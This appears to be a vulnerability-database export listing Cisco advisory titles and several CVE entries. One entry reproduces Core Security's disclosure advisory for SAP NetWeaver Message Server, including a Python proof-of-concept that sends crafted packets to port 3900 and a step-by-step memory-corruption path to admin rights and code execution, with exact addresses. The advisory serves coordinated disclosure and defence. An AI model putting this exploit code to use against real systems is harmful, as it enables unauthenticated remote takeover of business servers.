| cisco-sa-nxos-ebgp-dos-l3qcwvj | Cisco NX-OS Software External Border Gateway Protocol Denial of Service Vulnerability |
| cisco-sa-ipv6-mpls-dos-r9ycxkwm | Cisco NX-OS Software MPLS Encapsulated IPv6 Denial of Service Vulnerability |
| cisco-sa-cimc-xss-umytyetr | Cisco Integrated Management Controller Cross-Site Scripting Vulnerability |
| cisco-sa-cuic-access-control-jjszqmjj | Cisco Unified Intelligence Center Insufficient Access Control Vulnerability |
| cisco-sa-asaftd-info-disclose-9ejtycmb | Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software Web Services Information Disclosure Vulnerability |
| cisco-sa-clamav-hdffu6t | ClamAV OLE2 File Format Parsing Denial of Service Vulnerability |
| cisco-sa-expressway-csrf-knnzdmj3 | Cisco Expressway Series Cross-Site Request Forgery Vulnerabilities |
| cisco-sa-ftd-snort3acp-bypass-3bdr2beh | Multiple Cisco Products Snort 3 Access Control Policy Bypass Vulnerability |
| cisco-sa-cuc-unauth-afu-froyscsd | Cisco Unity Connection Unauthenticated Arbitrary File Upload Vulnerability |
| cisco-sa-cucm-rce-bwnzqcum | Cisco Unified Communications Products Remote Code Execution Vulnerability |
| cisco-sa-sb-bus-acl-bypass-5zn9hnjk | Cisco Small Business Series Switches Stacked Reload ACL Bypass Vulnerability |
| cisco-sa-cuc-xss-9tfuu5ms | Cisco Unity Connection Cross-Site Scripting Vulnerability |
| cisco-sa-sdwan-privesc-cli-xkgwmqku | Cisco SD-WAN Software Arbitrary File Corruption Vulnerability |
| cisco-sa-sd-wan-file-access-vw36d28p | Cisco SD-WAN Solution Improper Access Control Vulnerability |
| cisco-sa-broadworks-xss-6syj82ju | Cisco BroadWorks Application Delivery Platform and Xtended Services Platform Stored Cross-Site Scripting Vulnerability |
| cisco-sa-tms-portal-xss-axnevg3s | Cisco TelePresence Management Suite Cross-Site Scripting Vulnerabilities |
| cisco-sa-thouseyes-privesc-dmzhg3qv | Cisco ThousandEyes Enterprise Agent Virtual Appliance Privilege Escalation Vulnerability |
| cisco-sa-sb-wap-inject-bhstwgxo | Cisco WAP371 Wireless Access Point Command Injection Vulnerability |
| cisco-sa-pi-epnm-wkzjeyeq | Cisco Evolved Programmable Network Manager and Cisco Prime Infrastructure Vulnerabilities |
| cisco-sa-ise-xss-bl4vtml | Cisco Identity Services Engine Stored Cross-Site Scripting Vulnerability |
| cisco-sa-ise-priv-esc-kjlp2aw | Cisco Identity Services Engine Privilege Escalation Vulnerabilities |
| cisco-sa-struts-c2kcmkmt | Apache Struts Vulnerability Affecting Cisco Products: December 2023 |
| ID | Description |
|---|---|
| var-202001-0832 | A Buffer Overflow vulnerability exists in the Message Server service _MsJ2EE_AddStatistics() function when sending specially crafted SAP Message Server packets to remote TCP ports 36NN and/or 39NN in SAP NetWeaver 2004s, 7.01 SR1, 7.02 SP06, and 7.30 SP04, which could let a remote malicious user execute arbitrary code. SAP NetWeaver Contains a classic buffer overflow vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user suplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability.The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. If a package with sub opcode 0x4 contains a long parameter value string NetWeaver will eventually write a \x00 byte onto the stack to mark the end of the string. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code. Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or cause denial-of-service conditions. The following products are affected: SAP Netweaver 2004s SAP Netweaver 7.01 SR1 SAP Netweaver 7.02 SP06 SAP Netweaver 7.30 SP04. The vulnerability is due to a memory pointer error while processing certain packets by the affected software. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ CORE-2012-1128 1. *Advisory Information* Title: SAP Netweaver Message Server Multiple Vulnerabilities Advisory ID: CORE-2012-1128 Advisory URL: http://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities Date published: 2013-02-13 Date of last update: 2013-02-13 Vendors contacted: SAP Release mode: Coordinated release 2. *Vulnerability Information* Class: Improper Validation of Array Index [CWE-129], Buffer overflow [CWE-119] Impact: Code execution, Denial of service Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-1592, CVE-2013-1593 3. By sending different messages, the different vulnerabilities can be triggered. 4. *Vulnerable packages* . Older versions are probably affected too, but they were not checked. 5. *Non-vulnerable packages* . Vendor did not provide this information. 6. *Vendor Information, Solutions and Workarounds* SAP released the security note 1800603 [2] regarding these issues. 7. *Credits* Vulnerability [CVE-2013-1592] was discovered by Martin Gallo and Francisco Falcon, and additional research was performed by Francisco Falcon. Vulnerability [CVE-2013-1593] was discovered and researched by Martin Gallo from Core Security Consulting Services. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team. 8. *Technical Description / Proof of Concept Code* The following python script is the main PoC that can be used to reproduce all vulnerabilities described below: /----- import socket, struct from optparse import OptionParser # Parse the target options parser = OptionParser() parser.add_option("-d", "--hostname", dest="hostname", help="Hostname", default="localhost") parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3900) (options, args) = parser.parse_args() client_string = '-'+' '*39 server_name = '-'+' '*39 def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet) def receive(sock): length = sock.recv(4) (length, ) = struct.unpack("!I", length) data = "" while len(data)<length: data+= sock.recv(length) return (length, data) def initialize_connection(hostname, port): # Connect print "[*] Connecting to", hostname, "port", port connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connection.connect((hostname, port)) # Send initialization packet print "[*] Conected, sending login request" init = '**MESSAGE**\x00' # eyecatcher init+= '\x04' # version init+= '\x00' # errorno init+= client_string # toname init+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key init+= '\x01\x08' # flag / iflag (MS_LOGIN_2) init+= client_string # fromname init+= '\x00\x00' # padd send_packet(connection, init) # Receive response print "[*] Receiving login reply" (length, data) = receive(connection) # Parsing login reply server_name = data[4+64:4+64+40] return connection # Main PoC body connection = initialize_connection(options.hostname, options.port) send_attack(connection) -----/ In the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities. 8.1. Malicious packets are processed by the vulnerable function '_MsJ2EE_AddStatistics' in the 'msg_server.exe' module. The vulnerable function '_MsJ2EE_AddStatistics' receives a pointer to a 'MSJ2EE_HEADER' struct as its third parameter, which is fully controlled by the attacker. This struct type is defined as follows: /----- 00000000 MSJ2EE_HEADER struct ; (sizeof=0x28, standard type) 00000000 senderclusterid dd ? 00000004 clusterid dd ? 00000008 serviceid dd ? 0000000C groupid dd ? 00000010 nodetype db ? 00000011 db ? ; undefined 00000012 db ? ; undefined 00000013 db ? ; undefined 00000014 totallength dd ? 00000018 currentlength dd ? 0000001C currentoffset dd ? 00000020 totalblocks db ? 00000021 currentblock db ? 00000021 00000022 db ? ; undefined 00000023 db ? ; undefined 00000024 messagetype dd ? 00000028 MSJ2EE_HEADER ends -----/ The '_MsJ2EE_AddStatistics' function uses the 'serviceid' field of the 'MSJ2EE_HEADER' to calculate an index to write into the 'j2ee_stat_services' global array, without properly validating that the index is within the boundaries of the array. On the other hand, 'j2ee_stat_services' is a global array of 256 elements of type 'MSJ2EE_STAT_ELEMENT': /----- .data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256] .data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>) .data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o .data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ... -----/ This vulnerability can be used to corrupt arbitrary memory with arbitrary values, with some restrictions. The following snippet shows the vulnerable code within the '_MsJ2EE_AddStatistics' function: /----- mov edi, [ebp+pJ2eeHeader] mov eax, [edi+MSJ2EE_HEADER.serviceid] ;attacker controls MSJ2EE_HEADER.serviceid xor ecx, ecx cmp dword ptr j2ee_stat_total.totalMsgCount+4, ecx lea esi, [eax+eax*8] lea esi, j2ee_stat_services.totalMsgCount[esi*8] ;using the index without validating array bounds -----/ Since the 'serviceid' value is first multiplied by 9 and then it is multiplied by 8, the granularity of the memory addresses that can be targeted for memory corruption is 0x48 bytes, which is the size of the 'MSJ2EE_STAT_ELEMENT' struct: /----- 00000000 MSJ2EE_STAT_ELEMENT struc ; (sizeof=0x48, standard type) 00000000 ; XREF: .data:j2ee_stat_totalr 00000000 ; .data:j2ee_stat_servicesr 00000000 totalMsgCount dq ? ; XREF: _MsJ2EE_AddStatistics+1Br 00000000 ; _MsJ2EE_AddStatistics+2Fr ... 00000008 totalMsgLength dq ? ; XREF: _MsJ2EE_AddStatistics+192r 00000008 ; _MsJ2EE_AddStatistics+19Br ... 00000010 avgMsgLength dq ? ; XREF: _MsJ2EE_AddStatistics+1C2w 00000010 ; _MsJ2EE_AddStatistics+1C7w ... 00000018 maxLength dq ? ; XREF: _MsJ2EE_AddStatistics+161r 00000018 ; _MsJ2EE_AddStatistics+16Er ... 00000020 noP2PMessage dq ? ; XREF: _MsJ2EE_AddStatistics:loc_44D442w 00000020 ; _MsJ2EE_AddStatistics+158w ... 00000028 noP2PRequest dq ? ; XREF: _MsJ2EE_AddStatistics+144w 00000028 ; _MsJ2EE_AddStatistics+14Aw ... 00000030 noP2PReply dq ? ; XREF: _MsJ2EE_AddStatistics+132w 00000030 ; _MsJ2EE_AddStatistics+138w ... 00000038 noBroadcastMessage dq ? ; XREF: _MsJ2EE_AddStatistics:loc_44D40Dw 00000038 ; _MsJ2EE_AddStatistics+123w ... 00000040 noBroadcastRequest dq ? ; XREF: _MsJ2EE_AddStatistics+10Fw 00000040 ; _MsJ2EE_AddStatistics+115w ... 00000048 MSJ2EE_STAT_ELEMENT ends -----/ However, it is possible to use different combinations of the 'flag/iflag' values in the Message Server packet to gain more precision over the memory addresses that can be corrupted. Different combinations of 'flag/iflag' values provide different memory corruption primitives, as shown below: /----- At this point: * ESI points to an arbitrary, attacker-controlled memory address * EBX == 1 .text:0044D359 movzx eax, [ebp+msiflag] .text:0044D35D sub eax, 0Ch .text:0044D360 jz short loc_44D37C .text:0044D362 sub eax, ebx .text:0044D364 jnz short loc_44D39D .text:0044D366 cmp [ebp+msflag], 2 .text:0044D36A jnz short loc_44D374 .text:0044D36C add [esi+40h], ebx ; iflag=0xd, flag=2 => add 1 to [esi+0x40] .text:0044D36F adc [esi+44h], ecx .text:0044D372 jmp short loc_44D39D .text:0044D374 ; --------------------------------------------------------------------------- .text:0044D374 .text:0044D374 loc_44D374: ; CODE XREF: _MsJ2EE_AddStatistics+7Aj .text:0044D374 add [esi+38h], ebx ; iflag=0xd, flag=1 => add 1 to [esi+0x38] .text:0044D377 adc [esi+3Ch], ecx .text:0044D37A jmp short loc_44D39D .text:0044D37C ; --------------------------------------------------------------------------- .text:0044D37C .text:0044D37C loc_44D37C: ; CODE XREF: _MsJ2EE_AddStatistics+70j .text:0044D37C mov al, [ebp+msflag] .text:0044D37F cmp al, 3 .text:0044D381 jnz short loc_44D38B .text:0044D383 add [esi+30h], ebx ; iflag=0xc, flag=3 => add 1 to [esi+0x30] .text:0044D386 adc [esi+34h], ecx .text:0044D389 jmp short loc_44D39D .text:0044D38B ; --------------------------------------------------------------------------- .text:0044D38B .text:0044D38B loc_44D38B: ; CODE XREF: _MsJ2EE_AddStatistics+91j .text:0044D38B cmp al, 2 .text:0044D38D jnz short loc_44D397 .text:0044D38F add [esi+28h], ebx ; iflag=0xc, flag=2 => add 1 to [esi+0x28] .text:0044D392 adc [esi+2Ch], ecx .text:0044D395 jmp short loc_44D39D .text:0044D397 ; --------------------------------------------------------------------------- .text:0044D397 .text:0044D397 loc_44D397: ; CODE XREF: _MsJ2EE_AddStatistics+9Dj .text:0044D397 add [esi+20h], ebx ; iflag=0xc, flag=1 => add 1 to [esi+0x20] .text:0044D39A adc [esi+24h], ecx [...] -----/ And the following code excerpt is always executed within the '_MsJ2EE_AddStatistics' function, providing two more memory corruption primitives: /----- .text:0044D3B7 add [esi], ebx ;add 1 to [esi] .text:0044D3B9 adc dword ptr [esi+4], 0 .text:0044D3BD mov eax, [edi+MSJ2EE_HEADER.totallength] ;MSJ2EE_HEADER.totallength is fully controlled by the attacker .text:0044D3C0 cdq .text:0044D3C1 add [esi+8], eax ;add an arbitrary number to [esi+8] -----/ This memory corruption vulnerability can be used by remote unauthenticated attackers to execute arbitrary code on vulnerable installations of SAP Netweaver, but it can also be abused to modify the internal state of the vulnerable service in order to gain administrative privileges within the SAP Netweaver Message Server. A client connected to the Message Server may have administrative privileges or not. The Message Server holds a structure of type 'MSADM_s' for each connected client, which contains information about that very connection. Relevant parts of the 'MSADM_s' struct type are shown below: /----- 00000000 MSADM_s struc ; (sizeof=0x538, standard type) 00000000 ; XREF: .data:dummy_clientr 00000000 client_type dd ? ; enum MS_CLIENT_TYPE 00000004 stat dd ? ; enum MS_STAT 00000008 connection_ID dd ? 0000000C status db ? 0000000D dom db ? ; XREF: MsSFillCon+3Cw 0000000E admin_allowed db ? 0000000F db ? ; undefined 00000010 name dw 40 dup(?) [...] 00000534 _padding db 4 dup(?) 00000538 MSADM_s ends -----/ The 'admin_allowed' field at offset 0x0E is a boolean value that indicates whether the connected client has administrative privileges or not. When a new client connects, the 'MsSLoginClient' function of the Message Server sets the proper value for the 'admin_allowed' field in the 'MSADM_s' struct instance associated with that client: /----- .text:004230DC loc_4230DC: ; CODE XREF: MsSLoginClient+AAAj .text:004230DC ; MsSLoginClient+B26j .text:004230DC cmp byte ptr [edi+0Eh], 0 ; privileged client? .text:004230E0 jnz short loc_4230EA ; if yes, jump .text:004230E2 mov al, byte ptr ms_admin_allowed ; otherwise, grab the value of the "ms_admin_allowed" global variable... .text:004230E7 mov [edi+0Eh], al ; ...and save it to MSADM_s.admin_allowed -----/ So if we manage to overwrite the value of the 'ms_admin_allowed' global variable with a value different than 0, then we can grant administrative privileges to our unprivileged connections. In SAP Netweaver 'msg_server.exe' v7200.70.18.23869, the 'ms_admin_allowed' global variable is located at '0x008f17f0': /----- .data:008F17F0 ; int ms_admin_allowed .data:008F17F0 ms_admin_allowed dd ? ; DATA XREF: MsSSetMonitor+7Ew .data:008F17F0 ; MsSLoginClient+B62r -----/ And the 'j2ee_stat_services' global array, which is the array that can be indexed outside its bounds, is located at '0x0090b9e0': /----- .data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256] .data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>) .data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o .data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ... -----/ So, by providing 'MSJ2EE_HEADER.serviceid == 0x038E3315', we will be targeting '0x008F17C8' as the base address for memory corruption. Having in mind the different memory corruption primitives based on combinations of 'flag/iflag' fields described above, by specifying 'iflag == 0xC' and 'flag == 0x2' in our Message Server packet we will be able to add 1 to '[0x008F17C8+0x28]', effectively overwriting the contents of '0x008F17F0' ('ms_admin_allowed'). After overwriting 'ms_admin_allowed', all of our future connections will have administrative privileges within the Message Server. After gaining administrative privileges for our future connections, there are at least two possible paths of exploitation: 1. Of course it is not mandatory to have administrative privileges in order to overwrite function pointers, but considering the limitation of targetable addresses imposed by the little granularity of the memory corruption, some of the most handy-to-exploit function pointers happened to be accessible just for administrative connections. 2. Modify the configuration and behavior of the server. That includes changing Message Server's runtime parameters and enabling Monitor Mode in the affected server. 8.1.1. *Gaining remote code execution by overwriting function pointers* Having in mind that the granularity of the memory addresses that can be targeted for memory corruption is not that flexible (0x48 bytes) and the limited memory corruption primitives available, it takes some effort to find a function pointer that can be overwritten with a useful value and which can be later triggered with a network packet. One possibility is to overwrite one of the function pointers which are in charge of handling the modification of Message Server parameters: /----- .data:0087DED0 ; SHMPRF_CHANGEABLE_PARAMETER ms_changeable_parameter[58] ; function pointers associated to the modification of the "ms/max_sleep" parameter .data:0087DED0 ms_changeable_parameter SHMPRF_CHANGEABLE_PARAMETER <offset aMsMax_sleep, \ .data:0087DED0 offset MsSTestInteger, \ ; "rdisp/TRACE_PATTERN_2" .data:0087DED0 offset MsSSetMaxSleep> ; function pointers associated to the modification of the "ms/max_vhost" parameter .data:0087DED0 SHMPRF_CHANGEABLE_PARAMETER <offset aMsMax_vhost, \ .data:0087DED0 offset MsSTestInteger, \ ;<-- we can overwrite this one .data:0087DED0 offset MsSSetMaxVirtHost> [...] -----/ By providing 'MSJ2EE_HEADER.serviceid == 0x038E1967' we can target '0x0087DED8' as the base address for memory corruption. In this case we can use the memory corruption primitive at address '0x0044D3C1' that always gets executed, which will allow us to add an arbitrary number (the value of 'MSJ2EE_HEADER.totallength') to '[0x0087DED8+8]' effectively overwriting the function pointer shown above ('ms_changeable_parameter[1].set'). After that we need to send a 'MS_SET_PROPERTY' request, specifying 'ms/max_vhost' as the name of the property to be changed. This 'MS_SET_PROPERTY' packet will make our overwritten function pointer to be called from the 'MsSChangeParam' function: /----- .text:00404DB3 loc_404DB3: ; CODE XREF: MsSChangeParam+CDj .text:00404DB3 lea esi, [edi+edi*2] .text:00404DB6 mov edi, [ebp+pvalue] .text:00404DB9 add esi, esi .text:00404DBB mov edx, ms_changeable_parameter.test[esi+esi] .text:00404DC2 add esi, esi .text:00404DC4 push edi .text:00404DC5 push pname .text:00404DC6 call edx ; call our overwritten function pointer -----/ 'MS_SET_PROPERTY' packets will be ignored by the Message Server if the requesting client does not have administrative privileges, so it is necessary to gain administrative privileges as explained above before using the memory corruption vulnerability to overwrite one of the function pointers in the 'ms_changeable_parameter' global array. 8.1.2. *Modify the configuration and behavior of the server* After gaining administrative privileges for our connections, it is possible to perform 'MS_SET_PROPERTY' packets against the Message Server in order to modify its configuration and behavior. That makes possible, for example, to add virtual hosts to the load balancer, or to enable Monitor Mode [3] (transaction SMMS) on the affected server. Enabling Monitor Mode takes two steps: 1. Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/monitor"', property 'value == 1'. 2. Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/admin_port"', property 'value == 3535' (or any other arbitrary port number). After sending the second 'MS_SET_PROPERTY' packet, the SAP Netweaver Message Server will start listening on the specified port, waiting for connections from instances of the msmon.exe monitoring program [4]. The following python code can be used to trigger the vulnerability: /----- def send_attack(connection): print "[*] Sending crash packet" crash = '**MESSAGE**\x00' # eyecatcher crash+= '\x04' # version crash+= '\x00' # errorno crash+= server_name # toname crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key crash+= '\x04\x0d' # flag/iflag crash+= client_string # fromname crash+= '\x00\x00' # padd crash+= "ABCDEFGH"+"\x01\x00\x00\x00"+"MNOPQRSTUVWXYZ0123"+"\x01"+"56789abcd" crash+= "\x00\x00\x00\x01" crash+= "\xff\xff\xff\xff" crash+= "\x00\x00\x00\x00" send_packet(connection, crash) print "[*] Crash sent !" -----/ 8.2. Malicious packets are processed by the vulnerable function 'WRITE_C' in the 'msg_server.exe' module. The following python code can be used to trigger the vulnerability: /----- def send_attack(connection): print "[*] Sending crash packet" crash = '**MESSAGE**\x00' # eyecatcher crash+= '\x04' # version crash+= '\x00' # errorno crash+= server_name # toname crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key crash+= '\x04\x05' # flag/iflag crash+= client_string # fromname crash+= '\x00\x00' # padd crash+= "AD-EYECATCH\x00" crash+= "\x01\x01" crash+= "%11d" % 104 crash+= "%11d" % 1 crash+= "\x15\x00\x00\x00" crash+= "\x20\x00\x00\xc8" crash+= "LALA" + ' '*(20-4) crash+= "LOLO" + ' '*(40-4) crash+= " "*36 send_packet(connection, crash) print "[*] Crash sent !" -----/ 9. *Report Timeline* . 2012-12-10: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for January 22nd, 2013. 2012-12-10: Core sends an advisory draft with technical details and a PoC. 2012-12-11: The SAP team confirms the reception of the issue. 2012-12-21: SAP notifies that they concluded the analysis of the reported issues and confirms two out of the five vulnerabilities. Vendor also notifies that the other three reported issues were already fixed in February, 2012. Vendor also notifies that the necessary code changes are being done and extensive tests will follow. The corresponding security note and patches are planned to be released on the Security Patch Day in Feb 12th 2013. 2012-12-21: Core re-schedules the advisory publication for Feb 12th, 2013. 2012-12-28: SAP notifies Core that they will be contacted if tests fails in order to re-schedule the advisory publication. 2013-01-22: First release date missed. 2013-01-28: SAP notifies that they are still confident with releasing a security note and patches on Feb 12th as planned. 2013-01-29: Core acknowledges receiving the information and notifies that everything is ready for public disclosing on Feb 12th. Core also asks additional information regarding the patched vulnerabilities mentioned in [2012-12-21], including links to security bulletin, CVEs, and patches in order to verify if those patches effectively fix the reported flaws. 2013-02-01: SAP notifies that the patched vulnerabilities mentioned in [2012-12-21] were reported in [5] and no CVE were assigned to them. Those vulnerabilities seems to be related to ZDI advisories [6], [7], [8]. 2013-02-06: Core notifies that the patched vulnerabilities will be removed from the advisory and asks additional information regarding the affected and patched version numbers. 2013-02-01: SAP notifies that the security note 1800603 will be released and that note will provide further information regarting this vulnerability. 2013-02-13: Advisory CORE-2012-1128 published. 10. *References* [1] http://www.sap.com/platform/netweaver/index.epx. [2] SAP Security note Feb 2013 https://service.sap.com/sap/support/notes/1800603. [3] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e10000000a421937/content.htm. [4] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e10000000a42189d/frameset.htm. [5] SAP Security notes Feb 2012 https//service.sap.com/sap/support/notes/1649840. [6] http://www.zerodayinitiative.com/advisories/ZDI-12-104/. [7] http://www.zerodayinitiative.com/advisories/ZDI-12-111/. [8] http://www.zerodayinitiative.com/advisories/ZDI-12-112/. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ZDI-12-104 : SAP Netweaver ABAP msg_server.exe Parameter Value Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-104 June 27, 2012 - -- CVE ID: - -- CVSS: 10, AV:N/AC:L/Au:N/C:C/I:C/A:C - -- Affected Vendors: SAP - -- Affected Products: SAP NetWeaver - -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 12407. - -- Vendor Response: SAP has issued an update to correct this vulnerability. More details can be found at: http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d1 0-eea7-ceb666083a6a#section40 - -- Disclosure Timeline: 2011-10-28 - Vulnerability reported to vendor 2012-06-27 - Coordinated public release of advisory - -- Credit: This vulnerability was discovered by: * e6af8de8b1d4b2b6d5ba2610cbf9cd38 - -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 10.2.0 (Build 1950) Charset: utf-8 wsBVAwUBT+spXFVtgMGTo1scAQLsaAf7BDBhaaXu2xrm0nKo4KXmCuA091M40I4t uAkVEE7Zb4eFCtth3tsGSExGqDJp5LKfMe+KNfXUHMWcju+khxep8qfwxhnrtK2E 1doQXQmrqCJunJLKwReEa5MpcZGsYyantq0kCczWf5ZYlzLEsSk51GEYfvHx7WrR XFTr4krClMcDxi9nOxNDr/CqqGxxQlDgBsMD3EyzVQ92PBG8kTZHUAJwBPqh7Ku3 JqBWzVKDVVEsGxe7dlG4fXKIaDlCHaHJmsAr7+1Uw/DmfDOaTQMLRLvdGHY9Vpm6 wGIQD/1eAW66eLSBOeWXiRNHcorXRwu/SxQP8zIESkmWLZwKfZqbMA== =t/ct -----END PGP SIGNATURE----- |
| var-201208-0222 | Multiple stack-based buffer overflows in msg_server.exe in SAP NetWeaver ABAP 7.x allow remote attackers to cause a denial of service (crash) and execute arbitrary code via a (1) long parameter value, (2) crafted string size field, or (3) long Parameter Name string in a package with opcode 0x43 and sub opcode 0x4 to TCP port 3900. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of SAP Netweaver ABAP. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user suplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability.The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code. NetWeaver ABAP is prone to a denial-of-service vulnerability |
| var-202108-1148 | An access issue was addressed with improved access restrictions. This issue is fixed in macOS Monterey 12.0.1. A malicious application may be able to access local users' Apple IDs. apple's macOS Exists in unspecified vulnerabilities.Information may be obtained. ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by the CVE program. Notes: none |
| var-200202-0006 | Vulnerabilities in a large number of SNMP implementations allow remote attackers to cause a denial of service or gain privileges via SNMPv1 trap handling, as demonstrated by the PROTOS c06-SNMPv1 test suite. NOTE: It is highly likely that this candidate will be SPLIT into multiple candidates, one or more for each vendor. This and other SNMP-related candidates will be updated when more accurate information is available. Multiple vendor SNMPv1 Trap handling implementations contain vulnerabilities that may allow unauthorized privileged access, denial-of-service conditions, or unstable behavior . If your site uses SNMP in any capacity, the CERT/CC encourages you to read the information provided below. ------------ This vulnerability information is a summary of multiple vulnerabilities released at the same time. Please note that the contents of vulnerability information other than the title are included. ------------ SNMP Protocol is status and performance information MIB (Management Information Base) Protocol used to exchange Management side SNMP Managers such as managed routers, switches and printers SNMP Communicates with management network devices called agents. Because of its wide acceptance in the market, SNMP Has become the standard for SNMP protocol version1 Is SNMPv1 Is the most widely implemented. this SNMPv1 Sent from the agent to the manager in the implementation of SNMP Trap message and sent from the manager to the agent SNMP Decrypt the request message / There are problems in interpreting. If this problem is used by an attacker, the following actions may be executed. Many other programs that you implement may also be affected because of a protocol problem. On the target host SNMP If the service is running, an attacker could execute arbitrary code ・ If a buffer overflow attack is feasible and a very long trap message SNMP If the host on which the service is running receives, the application may go into a denial of service state The effects described above vary from application to application. For details, refer to each product.Please refer to the “Overview” for the impact of this vulnerability. Windows 95 is prone to a denial-of-service vulnerability. MPE/iX is an Internet-ready operating system for the HP e3000 class servers. It is possible to crash the service by transmitting to it a maliciously constructed SNMPv1 request PDU. It was previously known as UCD-SNMP. They typically notify the manager that some event has occured or otherwise provide information about the status of the agent. Multiple vulnerabilities have been discovered in a number of SNMP implementations. The vulnerabilities are known to exist in the process of decoding and interpreting SNMP trap messages. Among the possible consequences are denial of service and allowing attackers to compromise target systems. These depend on the individual vulnerabilities in each affected product. HP has confirmed that large traps will cause OpenView Network Node Manager to crash. This may be due to an exploitable buffer overflow condition |
| var-202007-0395 | Advantech iView, versions 5.6 and prior, contains multiple SQL injection vulnerabilities that are vulnerable to the use of an attacker-controlled string in the construction of SQL queries. An attacker could extract user credentials, read or modify information, and remotely execute code. Advantech iView Has SQL An injection vulnerability exists.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put in a state. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Advantech iView. Authentication is not required to exploit this vulnerability.The specific flaw exists within the NetworkServlet servlet. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise |
